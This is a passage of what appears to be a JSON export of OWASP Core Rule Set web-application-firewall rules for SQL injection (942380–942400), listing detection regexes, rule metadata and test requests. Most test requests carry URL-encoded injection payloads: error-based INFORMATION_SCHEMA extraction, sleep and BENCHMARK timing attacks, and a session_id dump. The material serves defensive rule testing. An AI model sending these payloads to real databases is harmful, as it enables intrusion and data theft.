"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" } ] }, { "description": "SQL Injection Attack", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" } ] }, { "description": "SQL Injection Attack", "test_id": 26, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" } ] }, { "description": "SQL Injection Attack", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" } ] }, { "description": "SQL Injection Attack", "test_id": 28, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" } ] }, { "description": "SQL Injection Attack", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" } ] }, { "description": "SQL Injection Attack", "test_id": 30, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" } ] }, { "description": "SQL Injection Attack", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute node_" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute node_" } ] }, { "description": "SQL Injection Attack", "test_id": 32, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute scald" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute scald" } ] }, { "description": "SQL Injection Attack", "test_id": 33, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute system" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute system" } ] }, { "description": "SQL Injection Attack", "test_id": 34, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute user_" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute user_" } ] }, { "description": "SQL Injection Attack", "test_id": 35, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute views" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute views" } ] }, { "description": "SQL Injection Attack", "test_id": 36, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute patha" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute patha" } ] }, { "description": "SQL Injection Attack", "test_id": 37, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute workb" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute workb" } ] }, { "description": "SQL Injection Attack", "test_id": 38, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute panel" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute panel" } ] }, { "description": "SQL Injection Attack", "test_id": 39, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=from+information_schema.tables+where+1%3D2+limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=from+information_schema.tables+where+1%3D2+limit" } ] }, { "description": "SQL Injection Attack", "test_id": 40, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" } ] }, { "description": "SQL Injection Attack", "test_id": 41, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" } ] }, { "description": "SQL Injection Attack", "test_id": 42, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 43, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" } ] }, { "description": "SQL Injection Attack", "test_id": 44, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" } ] }, { "description": "SQL Injection Attack: EXISTS", "test_id": 45, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1117, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:having\\b(?:[\\s\\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')[\\s\\x0b]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\\\"'][^=]{1,10}[ \\\"'<-\\?\\[]+))|ex(?:ecute(?:\\(|[\\s\\x0b]{1,5}[\\$\\.0-9A-Z_a-z]{1,5}[\\s\\x0b]{0,3})|ists[\\s\\x0b]*?\\([\\s\\x0b]*?select\\b)|(?:create[\\s\\x0b]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\\()|select.*?case|from.*?limit|order[\\s\\x0b]by|exists[\\s\\x0b](?:[\\s\\x0b]select|s(?:elect[^\\s\\x0b](?:if(?:null)?[\\s\\x0b]\\(|top|concat)|ystem[\\s\\x0b]\\()|\\bhaving\\b[\\s\\x0b]+[0-9]{1,10}|'[^=]{1,10}')", "actions": [ { "act_name": "id", "lineno": 1118, "act_quote": "no_quote", "act_arg": "942380", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1119, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1120, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1121, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1122, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1122, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1123, "act_quote": "quotes", "act_arg": "SQL Injection Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1124, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1125, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1126, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1127, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1128, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1129, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1130, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1131, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1132, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1133, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1134, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1135, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1136, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1117 } }, { "rule_id": "942390", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:or\\b(?:[\\s\\x0b]?(?:[0-9]{1,10}|[\\\"'][^=]{1,10}[\\\"'])[\\s\\x0b]?[<->]+|[\\s\\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\\s\\x0b]*?[<->])?)|xor\\b[\\s\\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\\s\\x0b]*?[<->])?)|'[\\s\\x0b]+x?or[\\s\\x0b]+.{1,20}[!\\+\\-<->]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=sdfsd%27or%201%20%3e%201", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=sdfsd%27or%201%20%3e%201" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1143, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:or\\b(?:[\\s\\x0b]?(?:[0-9]{1,10}|[\\\"'][^=]{1,10}[\\\"'])[\\s\\x0b]?[<->]+|[\\s\\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\\s\\x0b]*?[<->])?)|xor\\b[\\s\\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\\s\\x0b]*?[<->])?)|'[\\s\\x0b]+x?or[\\s\\x0b]+.{1,20}[!\\+\\-<->]", "actions": [ { "act_name": "id", "lineno": 1144, "act_quote": "no_quote", "act_arg": "942390", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1145, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1146, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1147, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1148, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1148, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1149, "act_quote": "quotes", "act_arg": "SQL Injection Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1150, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1151, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1152, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1153, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1154, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1155, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1156, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1157, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1158, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1159, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1160, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1161, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1162, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1143 } }, { "rule_id": "942400", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\band\\b(?:[\\s\\x0b]+(?:[0-9]{1,10}[\\s\\x0b]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\\\"'][^=]{1,10}[\\\"']) ?[<->]+)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "and '5'orig_var_datavarname=whatever" }, "expected": { "should_block": true, "rule_ids": [ 942400 ] }, "malicious_patterns": [ { "location": "post_body", "value": "and '5'orig_var_datavarname=whatever" } ] }, { "description": "SQL Injection Attack - false positive", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "and 7 oranges" }, "expected": { "should_block": false, "rule_ids": [ 942400 ] }, "malicious_patterns": [ { "location": "post_body", "value": "and 7 oranges" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1169, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\band\\b(?:[\\s\\x0b]+(?:[0-9]{1,10}[\\s\\x0b]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\\\"'][^=]{1,10}[\\\"']) ?[<->]+)", "actions": [ { "act_name": "id", "lineno": 1170, "act_quote": "no_quote", "act_arg": "942400", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1171, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1172, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1173, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1174, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1174, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1175, "act_quote": "quotes", "act_arg": "SQL Injection Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1176, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1177, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1178, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1179, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1180, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1181, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1182, "act_quote": "quotes", 